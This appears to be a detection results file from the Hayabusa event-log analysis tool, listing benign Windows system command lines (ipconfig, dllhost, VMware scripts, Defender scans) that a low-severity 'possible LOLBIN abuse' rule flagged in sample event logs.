+2016-08-20 05:47:31.026 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 05:47:31.073 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 05:47:46.745 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 06:12:04.462 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xda0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 06:12:28.290 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 06:12:41.946 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4b0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 06:13:05.290 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 08:02:20.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 08:02:20.640 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 08:02:22.265 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 08:02:35.890 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x494 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 08:02:40.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x720 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 08:02:40.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 01:03:06.082 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160820160305.log C:\Windows\Logs\CBS\CbsPersist_20160820160305.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xce8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 01:03:06.176 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 01:03:07.144 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 01:03:07.801 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x250 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 01:03:11.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x614 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 01:03:25.629 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc04 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 01:06:05.381 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 03:14:25.528 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x848 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 03:14:25.546 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 03:14:25.561 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 03:16:25.456 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 04:31:04.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 05:05:57.675 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 05:05:58.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 05:06:13.653 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf2c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 05:06:19.672 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdf0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 05:06:38.077 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-21 05:06:38.083 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x578 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:00:11.250 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:00:12.103 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:00:12.141 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:00:33.844 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc58 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:03:11.036 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x908 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:03:11.056 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:10:05.018 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:10:05.024 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8ec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:42:10.029 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:42:10.656 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:42:10.669 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:42:29.724 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:45:11.847 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xbb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:45:13.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-22 06:45:28.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-22 06:45:29.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:45:30.140 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:45:43.671 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:45:43.828 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:45:45.886 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:45:46.517 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xc00 | User: IEUser | LID: 0x4cfe1,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:45:47.330 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 06:58:44.730 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x238 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:00:01.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:00:01.685 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf54 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:24:56.194 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x210 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:31:56.163 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-22 07:31:56.506 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\hqhlzlxj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x710 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
